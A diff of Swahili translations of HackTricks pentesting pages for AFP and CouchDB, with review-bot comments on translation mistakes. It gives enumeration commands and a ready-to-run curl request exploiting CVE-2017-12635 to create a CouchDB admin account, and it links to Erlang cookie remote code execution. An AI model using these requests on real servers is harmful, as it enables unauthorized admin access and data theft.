Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kuhack AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inatangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi wa PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kuhack kwa kuwasilisha PR kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
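Review bot: the rewritten port-25672 bullet inverts the security advice. The earlier text read "Isipokuwa mawasiliano ya nje kwenye bandari hizi ni muhimu sana ... bandari hizi hazipaswi kuwa wazi kwa umma" (unless external connections on these ports are truly necessary, do not expose them publicly), while the new text opens with "Iwapo" (if), which tells the reader to keep the ports hidden only when external connections are necessary; restore "Isipokuwa". In the same hunk, "ports" became "mipangilio" (settings) in the heading "## Mipangilio Mingine ya RabbitMQ", in "rabbitmq inatumia mipangilio kadhaa" and in "Ni mipangilio 9 tu kati ya hizi", while the individual bullets still say "bandari"; use "bandari" throughout, as the previous version did.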


@ -1,55 +1,57 @@
# 548 - Kupima Apple Filing Protocol (AFP)
# 548 - Pentesting Apple Filing Protocol (AFP)
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inatangazwa kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
## Taarifa Msingi
## Basic Information
**Apple Filing Protocol** (**AFP**), zamani inajulikana kama AppleTalk Filing Protocol, ni itifaki maalum ya mtandao iliyomo ndani ya **Huduma ya Faili ya Apple** (**AFS**). Imeundwa kutoa huduma za faili kwa macOS na mfumo wa zamani wa Mac OS. AFP inajulikana kwa kusaidia majina ya faili ya Unicode, ruhusa za POSIX na orodha za kudhibiti upatikanaji, vifurushi vya rasilimali, sifa za ziada zilizopewa majina, na taratibu za kufunga faili za kisasa. Ilikuwa itifaki kuu ya huduma za faili katika Mac OS 9 na toleo za awali.
**Apple Filing Protocol** (**AFP**), zamani ikijulikana kama AppleTalk Filing Protocol, ni protokali maalum ya mtandao iliyojumuishwa ndani ya **Apple File Service** (**AFS**). Imeundwa kutoa huduma za faili kwa macOS na Mac OS ya jadi. AFP inajitofautisha kwa kuunga mkono majina ya faili ya Unicode, POSIX na ruhusa za orodha ya udhibiti wa ufikiaji, forks za rasilimali, sifa za ziada zenye majina, na mifumo ya kufunga faili ya kisasa. Ilikuwa protokali kuu ya huduma za faili katika Mac OS 9 na matoleo ya awali.
**Bandari ya Default:** 548
**Default Port:** 548
```bash
PORT STATE SERVICE
548/tcp open afp
```
### **Uchambuzi**
### **Kuhesabu**
Kwa ajili ya uchambuzi wa huduma za AFP, amri na hati zifuatazo ni muhimu:
Kwa kuhesabu huduma za AFP, amri na skripti zifuatazo ni muhimu:
```bash
msf> use auxiliary/scanner/afp/afp_server_info
nmap -sV --script "afp-* and not dos and not brute" -p <PORT> <IP>
```
**Scripts na Maelezo Yao:**
**Scripts and Their Descriptions:**
- **afp-ls**: Hii script hutumiwa kuorodhesha volumes na faili zilizopo za AFP.
- **afp-path-vuln**: Inaorodhesha volumes na faili zote za AFP, ikionyesha hatari za usalama.
- **afp-serverinfo**: Hutoa taarifa za kina kuhusu seva ya AFP.
- **afp-showmount**: Inaorodhesha hisa za AFP zilizopo pamoja na ACL zao husika.
- **afp-ls**: Hii script inatumika kuorodhesha volumu na faili za AFP zinazopatikana.
- **afp-path-vuln**: Inataja volumu na faili zote za AFP, ikionyesha uwezekano wa udhaifu.
- **afp-serverinfo**: Hii inatoa maelezo ya kina kuhusu seva ya AFP.
- **afp-showmount**: Inataja sehemu zinazopatikana za AFP pamoja na ACL zao husika.
### [**Brute Force**](../generic-methodologies-and-resources/brute-force.md#afp)
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi wa PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
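Review bot: the heading "### **Kuhesabu**" (literally "to count") stays in Swahili while every other heading and label in this file was switched to English ("## Basic Information", "**Default Port:**", "**Scripts and Their Descriptions:**"); use "### **Enumeration**" so the section titles match. Also, "POSIX na ruhusa za orodha ya udhibiti wa ufikiaji" reads as "POSIX and ACL permissions"; the earlier "ruhusa za POSIX na orodha za kudhibiti upatikanaji" (POSIX permissions and access control lists) correctly named the two separate features.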


@ -1,99 +1,100 @@
# 5984,6984 - Kupima Usalama wa CouchDB
# 5984,6984 - Pentesting CouchDB
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inatangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
## **Taarifa Msingi**
## **Basic Information**
**CouchDB** ni **nururishi wa hati** wenye uwezo na nguvu ambao hupanga data kwa kutumia muundo wa **ramani ya funguo-na-thamani** ndani ya kila **hati**. Sehemu ndani ya hati inaweza kuwakilishwa kama **jozi za funguo/thamani, orodha, au ramani**, ikitoa uwezo wa kuhifadhi na kupata data kwa urahisi.
**CouchDB** ni **hifadhidata** yenye uwezo na inayoweza kubadilika ambayo inaratibu data kwa kutumia muundo wa **ramani ya funguo-thamani** ndani ya kila **document**. Sehemu ndani ya hati zinaweza kuwakilishwa kama **funguo/maadili, orodha, au ramani**, ikitoa kubadilika katika uhifadhi na upatikanaji wa data.
Kila **hati** iliyohifadhiwa kwenye CouchDB inapewa kitambulisho cha kipekee (`_id`) kwenye kiwango cha hati. Kwa kuongezea, kila mabadiliko yaliyofanywa na kuhifadhiwa kwenye hifadhidata yanapewa nambari ya **marekebisho** (`_rev`). Nambari hii ya marekebisho inaruhusu ufuatiliaji na usimamizi wa mabadiliko kwa ufanisi, kurahisisha upatikanaji na usawazishaji wa data ndani ya hifadhidata.
Kila **document** iliyohifadhiwa katika CouchDB inapewa **kitambulisho cha kipekee** (`_id`) katika kiwango cha hati. Zaidi ya hayo, kila mabadiliko yaliyofanywa na kuhifadhiwa kwenye hifadhidata yanapewa **nambari ya marekebisho** (`_rev`). Nambari hii ya marekebisho inaruhusu **kufuatilia na kusimamia mabadiliko** kwa ufanisi, ikirahisisha upatikanaji na usawazishaji wa data ndani ya hifadhidata.
**Bandari ya chaguo-msingi:** 5984(http), 6984(https)
**Port ya kawaida:** 5984(http), 6984(https)
```
PORT STATE SERVICE REASON
5984/tcp open unknown syn-ack
```
## **Uchambuzi wa Kiotomatiki**
## **Uhesabuaji wa Otomatiki**
```bash
nmap -sV --script couchdb-databases,couchdb-stats -p <PORT> <IP>
msf> use auxiliary/scanner/couchdb/couchdb_enum
```
### Bango
## Manual Enumeration
Kabla ya kuanza kuchunguza CouchDB, ni muhimu kuanza kwa kukusanya habari kuhusu mfumo huo. Moja ya njia za kufanya hivyo ni kuchunguza bango la CouchDB. Bango ni ujumbe unaotumwa na mfumo wa CouchDB wakati unapofanya ombi la kwanza. Inaweza kutoa habari muhimu kama toleo la CouchDB na maelezo mengine ya kifaa. Unaweza kutumia zana kama `telnet` au `nc` kuunganisha kwenye seva ya CouchDB na kuchunguza bango.
### Banner
```
curl http://IP:5984/
```
Hii inatoa ombi la GET kwa mfano wa CouchDB iliyosakinishwa. Jibu linapaswa kuonekana kama moja ya yafuatayo:
Hii inatoa ombi la GET kwa mfano wa CouchDB uliofungwa. Jibu linapaswa kuonekana kama mojawapo ya yafuatayo:
```bash
{"couchdb":"Welcome","version":"0.10.1"}
{"couchdb":"Welcome","version":"2.0.0","vendor":{"name":"The Apache Software Foundation"}}
```
{% hint style="info" %}
Tafadhali kumbuka kuwa ikiwa unapata `401 Unauthorized` unapojaribu kufikia mizizi ya couchdb na ujumbe kama huu: `{"error":"unauthorized","reason":"Authentication required."}` **hutaweza kupata** bango au sehemu yoyote nyingine.
Kumbuka kwamba ikiwa unapata `401 Unauthorized` unapofikia mzizi wa couchdb na kitu kama hiki: `{"error":"unauthorized","reason":"Authentication required."}` **hutaweza kufikia** bendera au kiunganishi kingine chochote.
{% endhint %}
### Uchunguzi wa Taarifa
### Info Enumeration
Hizi ni sehemu ambapo unaweza kufikia kwa ombi la **GET** na kutoa taarifa muhimu. Unaweza kupata [**sehemu zaidi na maelezo zaidi katika nyaraka za couchdb**](https://docs.couchdb.org/en/latest/api/index.html).
Hizi ni kiunganishi ambacho unaweza kufikia kwa ombi la **GET** na kutoa taarifa za kuvutia. Unaweza kupata [**kiunganishi zaidi na maelezo ya kina katika nyaraka za couchdb**](https://docs.couchdb.org/en/latest/api/index.html).
* **`/_active_tasks`** Orodha ya kazi zinazoendelea, ikiwa ni pamoja na aina ya kazi, jina, hali na kitambulisho cha mchakato.
* **`/_all_dbs`** Inarudisha orodha ya maktaba zote katika kifaa cha CouchDB.
* **`/_cluster_setup`** Inarudisha hali ya kifaa au kikundi, kulingana na mchawi wa usanidi wa kikundi.
* **`/_db_updates`** Inarudisha orodha ya matukio yote ya maktaba katika kifaa cha CouchDB. Kuwepo kwa maktaba ya `_global_changes` kunahitajika ili kutumia sehemu hii.
* **`/_membership`** Inaonyesha vifaa ambavyo ni sehemu ya kikundi kama `cluster_nodes`. Uga wa `all_nodes` unaonyesha vifaa vyote ambavyo kifaa hiki kinajua, ikiwa ni pamoja na vile ambavyo ni sehemu ya kikundi.
* **`/_scheduler/jobs`** Orodha ya kazi za nakala. Maelezo ya kila kazi yatajumuisha habari ya chanzo na lengo, kitambulisho cha nakala, historia ya matukio ya hivi karibuni, na mambo mengine machache.
* **`/_scheduler/docs`** Orodha ya hali za hati za nakala. Inajumuisha habari kuhusu hati zote, hata katika hali za `completed` na `failed`. Kwa kila hati inarudisha kitambulisho cha hati, maktaba, kitambulisho cha nakala, chanzo na lengo, na habari nyingine.
* **`/_active_tasks`** Orodha ya kazi zinazofanyika, ikiwa ni pamoja na aina ya kazi, jina, hali na kitambulisho cha mchakato.
* **`/_all_dbs`** Inarudisha orodha ya hifadhidata zote katika mfano wa CouchDB.
* **`/_cluster_setup`** Inarudisha hali ya node au klasta, kulingana na msaidizi wa usanidi wa klasta.
* **`/_db_updates`** Inarudisha orodha ya matukio yote ya hifadhidata katika mfano wa CouchDB. Uwepo wa hifadhidata ya `_global_changes` unahitajika kutumia kiunganishi hiki.
* **`/_membership`** Inaonyesha nodes ambazo ni sehemu ya klasta kama `cluster_nodes`. Sehemu `all_nodes` inaonyesha nodes zote ambazo node hii inazijua, ikiwa ni pamoja na zile ambazo ni sehemu ya klasta.
* **`/_scheduler/jobs`** Orodha ya kazi za nakala. Maelezo ya kila kazi yatakuwa na taarifa za chanzo na lengo, kitambulisho cha nakala, historia ya tukio la hivi karibuni, na mambo mengine machache.
* **`/_scheduler/docs`** Orodha ya hali za hati za nakala. Inajumuisha taarifa kuhusu hati zote, hata katika hali za `completed` na `failed`. Kwa kila hati inarudisha kitambulisho cha hati, hifadhidata, kitambulisho cha nakala, chanzo na lengo, na taarifa nyingine.
* **`/_scheduler/docs/{replicator_db}`**
* **`/_scheduler/docs/{replicator_db}/{docid}`**
* **`/_node/{node-name}`** Sehemu ya `/_node/{node-name}` inaweza kutumika kuthibitisha jina la nodi ya Erlang ya seva inayoprocess ombi. Hii ni muhimu zaidi unapofikia `/_node/_local` ili kupata habari hii.
* **`/_node/{node-name}/_stats`** Rasilimali ya `_stats` inarudisha kitu cha JSON kinachojumuisha takwimu za seva inayofanya kazi. Kamba ya maandishi `_local` inatumika kama kifupi cha jina la nodi ya ndani, kwa hivyo kwa URL zote za takwimu, `{node-name}` inaweza kubadilishwa na `_local`, ili kuingiliana na takwimu za nodi ya ndani.
* **`/_node/{node-name}/_system`** Rasilimali ya \_system inarudisha kitu cha JSON kinachojumuisha takwimu mbalimbali za kiwango cha mfumo kwa seva inayofanya kazi. Unaweza kutumia `_local` kama {node-name} ili kupata habari ya nodi ya sasa.
* **`/_node/{node-name}`** Kiunganishi `/_node/{node-name}` kinaweza kutumika kuthibitisha jina la node ya Erlang ya seva inayoshughulikia ombi. Hii ni muhimu zaidi unapofikia `/_node/_local` ili kupata taarifa hii.
* **`/_node/{node-name}/_stats`** Rasilimali `_stats` inarudisha kitu cha JSON kinachojumuisha takwimu za seva inayofanya kazi. Mstari halisi `_local` hutumikia kama jina la badala kwa jina la node ya ndani, hivyo kwa URL zote za takwimu, `{node-name}` inaweza kubadilishwa na `_local`, ili kuingiliana na takwimu za node ya ndani.
* **`/_node/{node-name}/_system`** Rasilimali \_system inarudisha kitu cha JSON kinachojumuisha takwimu mbalimbali za kiwango cha mfumo kwa seva inayofanya kazi\_.\_ Unaweza kutumia \_\_`_local` kama {node-name} kupata taarifa za sasa za node.
* **`/_node/{node-name}/_restart`**
* **`/_up`** Inathibitisha kuwa seva iko juu, inafanya kazi, na iko tayari kujibu maombi. Ikiwa [`maintenance_mode`](https://docs.couchdb.org/en/latest/config/couchdb.html#couchdb/maintenance\_mode) ni `kweli` au `nolb`, sehemu itarudisha jibu la 404.
* **`/_uuids`** Inaomba kitambulisho kimoja au zaidi cha Kitambulisho cha Kipekee cha Kipekee (UUIDs) kutoka kifaa cha CouchDB.
* **`/_reshard`** Inarudisha idadi ya kazi zilizokamilika, zilizoshindwa, zinazoendelea, zilizosimamishwa, na jumla pamoja na hali ya kugawanya upya kwenye kikundi.
* **`/_up`** Inathibitisha kwamba seva iko juu, inafanya kazi, na iko tayari kujibu maombi. Ikiwa [`maintenance_mode`](https://docs.couchdb.org/en/latest/config/couchdb.html#couchdb/maintenance\_mode) ni `true` au `nolb`, kiunganishi kitarejesha jibu la 404.
* **`/_uuids`** Inahitaji kitambulisho kimoja au zaidi cha Kipekee Duniani (UUIDs) kutoka kwa mfano wa CouchDB.
* **`/_reshard`** Inarudisha hesabu ya kazi zilizokamilika, zilizoshindwa, zinazofanyika, zilizositishwa, na jumla pamoja na hali ya upya wa klasta.
Taarifa zaidi ya kuvutia inaweza kupatikana kama ilivyoelezwa hapa: [https://lzone.de/cheat-sheet/CouchDB](https://lzone.de/cheat-sheet/CouchDB)
Taarifa zaidi za kuvutia zinaweza kutolewa kama ilivyoelezwa hapa: [https://lzone.de/cheat-sheet/CouchDB](https://lzone.de/cheat-sheet/CouchDB)
### **Orodha ya Maktaba**
### **Orodha ya Hifadhidata**
```
curl -X GET http://IP:5984/_all_dbs
```
Ikiwa ombi hilo linajibu na 401 unauthorised, basi unahitaji **vyeti halali** ili kupata ufikiaji wa hifadhidata:
Ikiwa ombi hilo **linajibu na 401 isiyoidhinishwa**, basi unahitaji **vithibitisho halali** ili kufikia hifadhidata:
```
curl -X GET http://user:password@IP:5984/_all_dbs
```
Ili kupata Vitambulisho halali unaweza **jaribu** [**kuvunja nguvu huduma**](../generic-methodologies-and-resources/brute-force.md#couchdb).
Ili kupata Credentials halali unaweza **jaribu** [**kuvunjia huduma**](../generic-methodologies-and-resources/brute-force.md#couchdb).
Hii ni **mfano** wa jibu la couchdb unapokuwa na **mamlaka ya kutosha** ya kuorodhesha maktaba (Ni orodha tu ya maktaba):
Hii ni **mfano** wa **jibu** la couchdb unapokuwa na **mamlaka ya kutosha** ya kuorodhesha hifadhidata (Ni orodha tu ya dbs):
```bash
["_global_changes","_metadata","_replicator","_users","passwords","simpsons"]
```
### Taarifa za Database
### Database Info
Unaweza kupata taarifa za database (kama vile idadi ya faili na ukubwa) kwa kufikia jina la database:
Unaweza kupata baadhi ya taarifa za database (kama vile idadi ya faili na ukubwa) kwa kufikia jina la database:
```bash
curl http://IP:5984/<database>
curl http://localhost:5984/simpsons
#Example response:
{"db_name":"simpsons","update_seq":"7-g1AAAAFTeJzLYWBg4MhgTmEQTM4vTc5ISXLIyU9OzMnILy7JAUoxJTIkyf___z8rkQmPoiQFIJlkD1bHjE-dA0hdPFgdAz51CSB19WB1jHjU5bEASYYGIAVUOp8YtQsgavfjtx-i9gBE7X1i1D6AqAX5KwsA2vVvNQ","sizes":{"file":62767,"external":1320,"active":2466},"purge_seq":0,"other":{"data_size":1320},"doc_del_count":0,"doc_count":7,"disk_size":62767,"disk_format_version":6,"data_size":2466,"compact_running":false,"instance_start_time":"0"}
```
### **Orodha ya Nyaraka**
### **Orodha ya Hati**
Taja kila kuingia ndani ya kuhifadhi data
Orodha kila kipengee ndani ya hifadhidata
```bash
curl -X GET http://IP:5984/{dbname}/_all_docs
curl http://localhost:5984/simpsons/_all_docs
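Review bot: the `/_node/{node-name}/_system` bullet picked up stray escape sequences ("seva inayofanya kazi\_.\_" and "\_\_`_local`") that were not in the previous wording and will render as literal underscores and dots; drop them. The section is now titled "### Banner", but the hint below it says "bendera" (flag) where the earlier text said "bango"; the banner here is the server's version string, so keep "bango" or leave "banner" untranslated as the heading does. "**Port ya kawaida:**" mixes English "Port" with Swahili while the AFP file in this same commit uses "**Default Port:**"; pick one form for the whole commit.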
@ -108,47 +109,47 @@ curl http://localhost:5984/simpsons/_all_docs
{"id":"f53679a526a868d44172c83a6100451b","key":"f53679a526a868d44172c83a6100451b","value":{"rev":"1-3f6141f3aba11da1d65ff0c13fe6fd39"}}
]}
```
### **Soma Waraka**
### **Soma Hati**
Soma maudhui ya waraka ndani ya kuhifadhi data:
Soma maudhui ya hati ndani ya hifadhidata:
```bash
curl -X GET http://IP:5984/{dbname}/{id}
curl http://localhost:5984/simpsons/f0042ac3dc4951b51f056467a1000dd9
#Example response:
{"_id":"f0042ac3dc4951b51f056467a1000dd9","_rev":"1-fbdd816a5b0db0f30cf1fc38e1a37329","character":"Homer","quote":"Doh!"}
```
## Kuongeza Uteuzi wa Haki za CouchDB [CVE-2017-12635](https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-12635)
## CouchDB Privilege Escalation [CVE-2017-12635](https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-12635)
Kutokana na tofauti kati ya wapangaji wa JSON wa Erlang na JavaScript, unaweza **kuunda mtumiaji wa admin** na sifa za `hacktricks:hacktricks` kwa ombi lifuatalo:
Shukrani kwa tofauti kati ya parsers za Erlang na JavaScript JSON unaweza **kuunda mtumiaji wa admin** mwenye akauti `hacktricks:hacktricks` kwa ombi lifuatalo:
```bash
curl -X PUT -d '{"type":"user","name":"hacktricks","roles":["_admin"],"roles":[],"password":"hacktricks"}' localhost:5984/_users/org.couchdb.user:hacktricks -H "Content-Type:application/json"
```
[**Maelezo zaidi kuhusu kasoro hii hapa**](https://justi.cz/security/2017/11/14/couchdb-rce-npm.html).
[**Taarifa zaidi kuhusu hii vuln hapa**](https://justi.cz/security/2017/11/14/couchdb-rce-npm.html).
## CouchDB RCE
### **Uchambuzi wa Usalama wa Kuki ya Erlang**
### **Muhtasari wa Usalama wa Keki ya Erlang**
Mfano [kutoka hapa](https://0xdf.gitlab.io/2018/09/15/htb-canape.html).
Katika nyaraka za CouchDB, hasa katika sehemu inayohusu usanidi wa kikundi ([kiungo](http://docs.couchdb.org/en/stable/cluster/setup.html#cluster-setup)), matumizi ya bandari na CouchDB katika hali ya kikundi yanajadiliwa. Imetajwa kuwa, kama katika hali ya kujitegemea, bandari `5984` hutumiwa. Kwa kuongezea, bandari `5986` ni kwa ajili ya API za ndani ya kifaa, na muhimu zaidi, Erlang inahitaji bandari ya TCP `4369` kwa Erlang Port Mapper Daemon (EPMD), inayorahisisha mawasiliano ya kifaa ndani ya kikundi cha Erlang. Usanidi huu unajenga mtandao ambapo kila kifaa kimeunganishwa na kila kifaa kingine.
Katika nyaraka za CouchDB, hasa katika sehemu inayohusiana na usanidi wa klasta ([kiungo](http://docs.couchdb.org/en/stable/cluster/setup.html#cluster-setup)), matumizi ya bandari na CouchDB katika hali ya klasta yanajadiliwa. Inatajwa kwamba, kama katika hali ya pekee, bandari `5984` inatumika. Aidha, bandari `5986` ni kwa APIs za ndani za node, na muhimu zaidi, Erlang inahitaji bandari ya TCP `4369` kwa ajili ya Erlang Port Mapper Daemon (EPMD), inayowezesha mawasiliano ya node ndani ya klasta ya Erlang. Usanidi huu unaunda mtandao ambapo kila node inahusishwa na kila node nyingine.
Onyo muhimu la usalama linasisitizwa kuhusu bandari `4369`. Ikiwa bandari hii inapatikana kupitia Mtandao au mtandao usioaminika, usalama wa mfumo unategemea sana kitambulisho kipekee kinachojulikana kama "kuki." Kuki hii inafanya kazi kama kinga. Kwa mfano, katika orodha ya michakato fulani, kuki inayoitwa "monster" inaweza kuonekana, ikionyesha jukumu lake katika mfumo wa usalama wa mfumo.
Taarifa muhimu ya usalama inasisitizwa kuhusu bandari `4369`. Ikiwa bandari hii itapatikana kupitia Mtandao au mtandao wowote usioaminika, usalama wa mfumo unategemea sana kitambulisho cha kipekee kinachojulikana kama "keki." Keki hii inafanya kazi kama kinga. Kwa mfano, katika orodha fulani ya michakato, keki iliyopewa jina "monster" inaweza kuonekana, ikionyesha jukumu lake katika mfumo wa usalama wa mfumo.
```
www-data@canape:/$ ps aux | grep couchdb
root 744 0.0 0.0 4240 640 ? Ss Sep13 0:00 runsv couchdb
root 811 0.0 0.0 4384 800 ? S Sep13 0:00 svlogd -tt /var/log/couchdb
homer 815 0.4 3.4 649348 34524 ? Sl Sep13 5:33 /home/homer/bin/../erts-7.3/bin/beam -K true -A 16 -Bd -- -root /home/homer/b
```
Kwa wale wanaopenda kuelewa jinsi "cookie" hii inaweza kutumiwa kwa Remote Code Execution (RCE) ndani ya muktadha wa mifumo ya Erlang, sehemu maalum imeandikwa kwa ajili ya kusoma zaidi. Inaelezea njia za kutumia "cookies" za Erlang kwa njia zisizoidhinishwa ili kupata udhibiti wa mifumo. Unaweza **[kuchunguza mwongozo kamili wa kutumia "cookies" za Erlang kwa RCE hapa](4369-pentesting-erlang-port-mapper-daemon-epmd.md#erlang-cookie-rce)**.
Kwa wale wanaovutiwa na kuelewa jinsi "keki" hii inaweza kutumika kwa ajili ya Remote Code Execution (RCE) ndani ya muktadha wa mifumo ya Erlang, sehemu maalum inapatikana kwa ajili ya kusoma zaidi. Inabainisha mbinu za kutumia keki za Erlang kwa njia zisizoidhinishwa ili kupata udhibiti wa mifumo. Unaweza **[kuchunguza mwongozo wa kina juu ya kutumia keki za Erlang kwa RCE hapa](4369-pentesting-erlang-port-mapper-daemon-epmd.md#erlang-cookie-rce)**.
### **Kutumia CVE-2018-8007 kwa Kurekebisha local.ini**
### **Kutatua CVE-2018-8007 kupitia Marekebisho ya local.ini**
Mfano [kutoka hapa](https://0xdf.gitlab.io/2018/09/15/htb-canape.html).
